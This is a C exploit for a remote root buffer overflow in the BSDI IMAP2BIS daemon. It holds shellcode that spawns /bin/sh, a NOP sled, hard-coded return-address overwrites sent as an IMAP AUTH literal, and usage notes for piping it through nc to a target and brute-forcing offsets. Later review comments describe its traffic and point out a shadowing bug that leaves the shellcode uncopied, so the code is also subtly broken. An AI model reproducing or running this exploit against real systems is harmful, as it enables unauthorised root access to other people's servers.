/*

  BSDI IMAP2BIS remote root exploit

  Usage:   (./imapx <offset>;cat)| nc targethost 143
           
             where offset = -1000..1000  (brute force if 0 doesn't work)

  Note:
          if you plan to port this to other OS., make sure the
          shellcode doesn't contain lower case chars since imapd
          will toupper() the shellcode, thus fucking it up.
  Note:
          I tested this on a few systems and found these offsets vulnerable

*/

#include <stdio.h>
#include <stdlib.h>
#include <limits.h>
#include <string.h>

#define BUFLEN 4092
#define NOP 0x90

/*
 * Payload bytes carried inside the IMAP literal that main() emits.  The
 * header comment calls this the shellcode; the last line is the ASCII
 * text "BIN/SH" in uppercase, matching the note above that imapd passes
 * the data through toupper().
 *
 * NOTE(review): main() declares a local array with the same name, which
 * shadows this file-scope definition for the whole function body; the
 * memcpy()/strlen() in main() therefore operate on that (uninitialized)
 * local, not on these bytes.  -Wshadow reports this.
 */
char shell[] =
 
   "\xeb\x58\x5e"
    "\x31\xdb\x83\xc3\x08\x83\xc3\x02\x88\x5e\x26"
    "\x31\xdb\x83\xc3\x23\x83\xc3\x23\x88\x5e\xa8"
    "\x31\xdb\x83\xc3\x26\x83\xc3\x30\x88\x5e\xc2"
    "\x31\xc0\x88\x46\x0b\x89\xf3\x83\xc0\x05\x31"
    "\xc9\x83\xc1\x01\x31\xd2\xcd\x80\x89\xc3\x31"
    "\xc0\x83\xc0\x04\x31\xd2\x88\x56\x27\x89\xf1"
    "\x83\xc1\x0c\x83\xc2\x1b\xcd\x80\x31\xc0\x83"
    "\xc0\x06\xcd\x80\x31\xc0\x83\xc0\x01\xcd\x80"
    "\x42\x49\x4e\x2f\x53\x48\x00";

/*
 * Writes a single IMAP command to stdout: the literal header "{4092} AUTH",
 * CRLF, 4092 raw bytes, CRLF.  The 4092-byte literal starts as a block of
 * 0x90 (NOP) bytes; from byte 1024 onward a 4-byte value is stored at every
 * second byte.  On the wire, then, this is an AUTH command whose literal is
 * almost entirely 0x90, which is the shape a network sensor would observe.
 *
 * argv[1] is an integer added to the hard-coded address in `esp`.  argc is
 * never checked, so running with no argument passes a NULL argv[1] to
 * atoi().  main() is declared void and ends in a bare return, which is
 * non-standard C.
 */
void
main (int argc, char *argv[])
{
  char buf[BUFLEN];
  int offset,nop,i;
  unsigned long esp; 
  /* NOTE(review): shadows the file-scope `shell` string for the rest of this
   * function (-Wshadow).  It is never initialized before the strlen()/memcpy()
   * below, so those calls read indeterminate stack bytes rather than the bytes
   * defined at file scope; the only write to it happens later, in the loop. */
  char shell[1024+300];

  /* Printed unconditionally, whether or not an offset was supplied. */
  fprintf(stderr,"usage: %s <offset>\n", argv[0]);

  nop = 403;              /* index in buf where the memcpy() below starts */
  esp = 0xefbfd5e8;       /* hard-coded guessed address; argv[1] shifts it */
  offset = atoi(argv[1]); /* atoi() reports no errors: non-numeric input yields 0 */
  
  memset(buf, NOP, BUFLEN);                      /* fill the whole literal with 0x90 */
  memcpy(buf+(long)nop, shell, strlen(shell));   /* `shell` here is the shadowing local */
  
  /* For i = 1024, 1026, ... up to BUFLEN-4, store esp+offset as a 4-byte int
   * at buf[i].  The stores are unaligned and each overlaps the previous one,
   * and the int* cast of a char array breaks strict aliasing.  esp+offset is
   * an unsigned long that is truncated to int on store.  The assignment to
   * shell[...] is loop-invariant: it only zeroes the last byte of the local
   * array (sizeof(shell) is the local's size here, 1324), on every pass. */
  for (i = 1024; i < BUFLEN - 3; i += 2)
{    *((int *) &buf[i]) = esp + (long) offset;
     shell[ sizeof(shell)-1 ] = 0;
} 
 
 /* IMAP literal header announcing BUFLEN (4092) bytes to follow. */
 printf("{%d} AUTH\r\n", BUFLEN);
  /* Emit the literal byte by byte; buf is not a C string, so every byte
   * is written regardless of its value. */
  for (i = 0; i < BUFLEN; i++)
    putchar(buf[i]);
  
  printf("\r\n");

  return;
}